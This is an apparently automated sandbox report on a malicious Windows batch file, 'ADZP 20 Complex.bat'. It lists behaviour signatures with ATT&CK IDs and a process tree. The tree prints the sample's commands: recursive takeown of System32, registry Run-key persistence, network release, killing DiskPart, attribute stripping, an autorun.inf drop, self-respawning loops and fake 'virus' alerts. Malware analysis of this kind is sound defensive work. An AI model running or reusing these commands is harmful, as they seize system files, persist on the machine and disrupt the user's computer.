29415d32850d821d9854bfd6edabee920052e0920e6eceec187ea57b8a3c707e

Analysis

max time kernel
12s
max time network
121s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
25-05-2024 17:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ADZP 20 Complex.bat
Size

17KB
MD5

591700c81fbd38cf8c83092030536c14
SHA1

a122ca4b91ec2275400e10f21093c43186391c97
SHA256

29415d32850d821d9854bfd6edabee920052e0920e6eceec187ea57b8a3c707e
SHA512

ae3e1ffef5a82016f13fe728a8a3f2696ed55cdd9ea60d6e75352d55f95fe71cb09bad02945601d4661818473882cc4fae4493d9125e3803054e69c861a97758
SSDEEP

192:Un0iMJWap3ahz9j3E301VaYYATCdhSouXKN:ZJWo3yzHVbYMW

Score

8^/10

discovery exploit spyware stealer

Malware Config

Signatures

Possible privilege escalation attempt 15 IoCs

exploit

Processes:

takeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exe

pid	process
6932	takeown.exe
6788	takeown.exe
6776	takeown.exe
6976	takeown.exe
5440	icacls.exe
3540	icacls.exe
6708	takeown.exe
1600	takeown.exe
1864	takeown.exe
6764	takeown.exe
7000	takeown.exe
632	takeown.exe
6740	takeown.exe
6732	takeown.exe
2200	takeown.exe

Modifies file permissions 1 TTPs 15 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

takeown.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exe

pid	process
632	takeown.exe
2200	takeown.exe
6708	takeown.exe
5440	icacls.exe
3540	icacls.exe
6764	takeown.exe
6932	takeown.exe
7000	takeown.exe
1600	takeown.exe
6732	takeown.exe
6776	takeown.exe
1864	takeown.exe
6740	takeown.exe
6788	takeown.exe
6976	takeown.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Drops autorun.inf file 1 TTPs 8 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

Processes:

attrib.exeattrib.exeattrib.execmd.exeattrib.execmd.execmd.execmd.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	attrib.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	attrib.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	attrib.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	attrib.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	cmd.exe

Drops file in System32 directory 5 IoCs

Processes:

cmd.execmd.execmd.execmd.exe

description	ioc	process
File created	C:\Windows\System32\Twain_20.dll	cmd.exe
File opened for modification	C:\Windows\System32\Twain_20.dll	cmd.exe
File opened for modification	C:\Windows\System32\Twain_20.dll	cmd.exe
File opened for modification	C:\Windows\System32\Twain_20.dll	cmd.exe
File opened for modification	C:\Windows\System32\Twain_20.dll	cmd.exe

Drops file in Windows directory 9 IoCs

Processes:

mspaint.exemspaint.exemspaint.exemspaint.exemspaint.exemspaint.exemspaint.exemspaint.exemspaint.exe

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Gathers network information 2 TTPs 13 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

Processes:

ipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exe

pid	process
2820	ipconfig.exe
5704	ipconfig.exe
6540	ipconfig.exe
2104	ipconfig.exe
5980	ipconfig.exe
6000	ipconfig.exe
2712	ipconfig.exe
5796	ipconfig.exe
5884	ipconfig.exe
6444	ipconfig.exe
632	ipconfig.exe
1464	ipconfig.exe
6508	ipconfig.exe

Kills process with taskkill 13 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
6056	taskkill.exe
5620	taskkill.exe
6132	taskkill.exe
5636	taskkill.exe
6076	taskkill.exe
6516	taskkill.exe
6612	taskkill.exe
1784	taskkill.exe
1672	taskkill.exe
956	taskkill.exe
6576	taskkill.exe
2936	taskkill.exe
2628	taskkill.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

Processes:

takeown.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetakeown.exetakeown.exetakeown.exe

description	pid	process
Token: SeTakeOwnershipPrivilege	1600	takeown.exe
Token: SeDebugPrivilege	2936	taskkill.exe
Token: SeDebugPrivilege	1784	taskkill.exe
Token: SeDebugPrivilege	1672	taskkill.exe
Token: SeDebugPrivilege	2628	taskkill.exe
Token: SeTakeOwnershipPrivilege	1864	takeown.exe
Token: SeTakeOwnershipPrivilege	632	takeown.exe
Token: SeTakeOwnershipPrivilege	2200	takeown.exe

Suspicious use of SetWindowsHookEx 21 IoCs

Processes:

mspaint.exemspaint.exemspaint.exemspaint.exemspaint.exemspaint.exemspaint.exemspaint.exemspaint.exe

pid	process
1016	mspaint.exe
2948	mspaint.exe
748	mspaint.exe
2948	mspaint.exe
1016	mspaint.exe
748	mspaint.exe
1016	mspaint.exe
2948	mspaint.exe
1016	mspaint.exe
2948	mspaint.exe
748	mspaint.exe
748	mspaint.exe
3088	mspaint.exe
3156	mspaint.exe
1672	mspaint.exe
3628	mspaint.exe
3820	mspaint.exe
3920	mspaint.exe
3088	mspaint.exe
3156	mspaint.exe
1672	mspaint.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.execmd.exe

description	pid	process	target process
PID 2336 wrote to memory of 2708	2336	cmd.exe	cmd.exe
PID 2336 wrote to memory of 2708	2336	cmd.exe	cmd.exe
PID 2336 wrote to memory of 2708	2336	cmd.exe	cmd.exe
PID 2336 wrote to memory of 2600	2336	cmd.exe	cmd.exe
PID 2336 wrote to memory of 2600	2336	cmd.exe	cmd.exe
PID 2336 wrote to memory of 2600	2336	cmd.exe	cmd.exe
PID 2336 wrote to memory of 2488	2336	cmd.exe	WScript.exe
PID 2336 wrote to memory of 2488	2336	cmd.exe	WScript.exe
PID 2336 wrote to memory of 2488	2336	cmd.exe	WScript.exe
PID 2336 wrote to memory of 2524	2336	cmd.exe	cmd.exe
PID 2336 wrote to memory of 2524	2336	cmd.exe	cmd.exe
PID 2336 wrote to memory of 2524	2336	cmd.exe	cmd.exe
PID 2336 wrote to memory of 2152	2336	cmd.exe	reg.exe
PID 2336 wrote to memory of 2152	2336	cmd.exe	reg.exe
PID 2336 wrote to memory of 2152	2336	cmd.exe	reg.exe
PID 2336 wrote to memory of 748	2336	cmd.exe	mspaint.exe
PID 2336 wrote to memory of 748	2336	cmd.exe	mspaint.exe
PID 2336 wrote to memory of 748	2336	cmd.exe	mspaint.exe
PID 2524 wrote to memory of 1600	2524	cmd.exe	takeown.exe
PID 2524 wrote to memory of 1600	2524	cmd.exe	takeown.exe
PID 2524 wrote to memory of 1600	2524	cmd.exe	takeown.exe
PID 2336 wrote to memory of 2820	2336	cmd.exe	ipconfig.exe
PID 2336 wrote to memory of 2820	2336	cmd.exe	ipconfig.exe
PID 2336 wrote to memory of 2820	2336	cmd.exe	ipconfig.exe
PID 2336 wrote to memory of 2936	2336	cmd.exe	taskkill.exe
PID 2336 wrote to memory of 2936	2336	cmd.exe	taskkill.exe
PID 2336 wrote to memory of 2936	2336	cmd.exe	taskkill.exe
PID 2336 wrote to memory of 1560	2336	cmd.exe	attrib.exe
PID 2336 wrote to memory of 1560	2336	cmd.exe	attrib.exe
PID 2336 wrote to memory of 1560	2336	cmd.exe	attrib.exe
PID 2336 wrote to memory of 2016	2336	cmd.exe	WScript.exe
PID 2336 wrote to memory of 2016	2336	cmd.exe	WScript.exe
PID 2336 wrote to memory of 2016	2336	cmd.exe	WScript.exe
PID 2336 wrote to memory of 1700	2336	cmd.exe	WScript.exe
PID 2336 wrote to memory of 1700	2336	cmd.exe	WScript.exe
PID 2336 wrote to memory of 1700	2336	cmd.exe	WScript.exe
PID 2336 wrote to memory of 2052	2336	cmd.exe	WScript.exe
PID 2336 wrote to memory of 2052	2336	cmd.exe	WScript.exe
PID 2336 wrote to memory of 2052	2336	cmd.exe	WScript.exe
PID 2336 wrote to memory of 612	2336	cmd.exe	WScript.exe
PID 2336 wrote to memory of 612	2336	cmd.exe	WScript.exe
PID 2336 wrote to memory of 612	2336	cmd.exe	WScript.exe
PID 2336 wrote to memory of 1880	2336	cmd.exe	WScript.exe
PID 2336 wrote to memory of 1880	2336	cmd.exe	WScript.exe
PID 2336 wrote to memory of 1880	2336	cmd.exe	WScript.exe
PID 2336 wrote to memory of 1964	2336	cmd.exe	WScript.exe
PID 2336 wrote to memory of 1964	2336	cmd.exe	WScript.exe
PID 2336 wrote to memory of 1964	2336	cmd.exe	WScript.exe
PID 2336 wrote to memory of 1740	2336	cmd.exe	WScript.exe
PID 2336 wrote to memory of 1740	2336	cmd.exe	WScript.exe
PID 2336 wrote to memory of 1740	2336	cmd.exe	WScript.exe
PID 2336 wrote to memory of 1300	2336	cmd.exe	WScript.exe
PID 2336 wrote to memory of 1300	2336	cmd.exe	WScript.exe
PID 2336 wrote to memory of 1300	2336	cmd.exe	WScript.exe
PID 2336 wrote to memory of 1576	2336	cmd.exe	WScript.exe
PID 2336 wrote to memory of 1576	2336	cmd.exe	WScript.exe
PID 2336 wrote to memory of 1576	2336	cmd.exe	WScript.exe
PID 2336 wrote to memory of 2592	2336	cmd.exe	WScript.exe
PID 2336 wrote to memory of 2592	2336	cmd.exe	WScript.exe
PID 2336 wrote to memory of 2592	2336	cmd.exe	WScript.exe
PID 2336 wrote to memory of 2552	2336	cmd.exe	msg.exe
PID 2336 wrote to memory of 2552	2336	cmd.exe	msg.exe
PID 2336 wrote to memory of 2552	2336	cmd.exe	msg.exe
PID 2336 wrote to memory of 2724	2336	cmd.exe	msg.exe

Views/modifies file attributes 1 TTPs 5 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid process

1560 attrib.exe
2372 attrib.exe
1240 attrib.exe
864 attrib.exe
5728 attrib.exe

pid	process
1560	attrib.exe
2372	attrib.exe
1240	attrib.exe
864	attrib.exe
5728	attrib.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
1⤵
- Drops autorun.inf file
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2336

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
2⤵
PID:2708

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
2⤵
PID:2600

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
2⤵
PID:2488

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
2⤵
- Suspicious use of WriteProcessMemory
PID:2524

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1600

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
2⤵
PID:2152

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
2⤵
PID:748

C:\Windows\system32\ipconfig.exe
ipconfig /release
2⤵
- Gathers network information
PID:2820

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2936

C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
2⤵
- Drops autorun.inf file
- Views/modifies file attributes
PID:1560

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
2⤵
PID:2016

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
2⤵
PID:1700

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
2⤵
PID:2052

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
2⤵
PID:612

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
2⤵
PID:1880

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
2⤵
PID:1964

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
2⤵
PID:1740

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
2⤵
PID:1300

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
2⤵
PID:1576

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
2⤵
PID:2592

C:\Windows\system32\msg.exe
msg * Virus Detectado
2⤵
PID:2552

C:\Windows\system32\msg.exe
msg * Virus Detectado
2⤵
PID:2724

C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
2⤵
PID:2480

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
2⤵
- Drops autorun.inf file
- Drops file in System32 directory
PID:2472

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
3⤵
PID:1612

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
3⤵
PID:2996

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
3⤵
PID:548

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
3⤵
PID:2184

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:632

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
3⤵
PID:1628

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
3⤵
PID:2068

C:\Windows\system32\ipconfig.exe
ipconfig /release
3⤵
- Gathers network information
PID:2104

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1784

C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
3⤵
- Drops autorun.inf file
- Views/modifies file attributes
PID:1240

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:2096

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:1004

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:1620

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:2664

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:2140

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:2352

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:1428

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:2032

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:3140

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:3472

C:\Windows\system32\msg.exe
msg * Virus Detectado
3⤵
PID:3492

C:\Windows\system32\msg.exe
msg * Virus Detectado
3⤵
PID:3752

C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
3⤵
PID:3876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
3⤵
PID:4068

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
4⤵
PID:4188

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
4⤵
PID:4224

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
4⤵
PID:4996

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
4⤵
PID:4692

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6708

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
4⤵
PID:5112

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
4⤵
PID:5236

C:\Windows\system32\ipconfig.exe
ipconfig /release
4⤵
- Gathers network information
PID:5704

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
4⤵
- Kills process with taskkill
PID:956

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:4076

C:\Windows\system32\calc.exe
calc
3⤵
PID:3100

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:608

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:3088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
3⤵
PID:3084

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
4⤵
PID:4336

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
4⤵
PID:4756

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
4⤵
PID:3892

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
4⤵
PID:4824

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6740

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
4⤵
PID:4652

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
4⤵
PID:5456

C:\Windows\system32\ipconfig.exe
ipconfig /release
4⤵
- Gathers network information
PID:5980

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
4⤵
- Kills process with taskkill
PID:5620

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:3108

C:\Windows\system32\calc.exe
calc
3⤵
PID:3124

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:3132

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:3156

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
3⤵
PID:3160

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
4⤵
PID:5052

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
4⤵
PID:4884

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
4⤵
PID:4780

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6732

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
4⤵
PID:5116

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
4⤵
PID:5504

C:\Windows\system32\ipconfig.exe
ipconfig /release
4⤵
- Gathers network information
PID:6000

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
4⤵
- Kills process with taskkill
PID:5636

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:3180

C:\Windows\system32\calc.exe
calc
3⤵
PID:3196

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:3204

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:1672

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:3520

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:3940

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:4016

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:4100

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:4492

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:4800

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
3⤵
PID:7104

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:7112

C:\Windows\system32\calc.exe
calc
3⤵
PID:7128

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:7136

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:7144

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
3⤵
PID:7152

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:7160

C:\Windows\system32\calc.exe
calc
3⤵
PID:5800

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:5456

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:6120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
3⤵
PID:4396

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:1412

C:\Windows\system32\calc.exe
calc
3⤵
PID:4712

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:5736

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:6148

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
3⤵
PID:6156

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:6164

C:\Windows\system32\calc.exe
calc
3⤵
PID:6204

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:2316

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:4688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
3⤵
PID:6260

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:6248

C:\Windows\system32\calc.exe
calc
3⤵
PID:6280

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:6304

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:6348

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
3⤵
PID:6312

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:6320

C:\Windows\system32\calc.exe
calc
3⤵
PID:6356

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:6380

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:3096

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
3⤵
PID:6504

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:6508

C:\Windows\system32\calc.exe
calc
3⤵
PID:6544

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:6676

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:4900

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
3⤵
PID:6704

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:2208

C:\Windows\system32\calc.exe
calc
3⤵
PID:1548

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:2648

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:2268

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
3⤵
PID:1816

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:6864

C:\Windows\system32\calc.exe
calc
3⤵
PID:6916

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:5504

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:5704

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
3⤵
PID:1348

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:6608

C:\Windows\system32\calc.exe
calc
3⤵
PID:3236

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:3708

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:7060

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
3⤵
PID:4436

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:4448

C:\Windows\system32\calc.exe
calc
3⤵
PID:4192

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:5160

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:5176

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
3⤵
PID:5216

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:5332

C:\Windows\system32\calc.exe
calc
3⤵
PID:5364

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:7100

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:5420

C:\Windows\system32\icacls.exe
icacls "C:\Program Files"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5440

C:\Windows\system32\attrib.exe
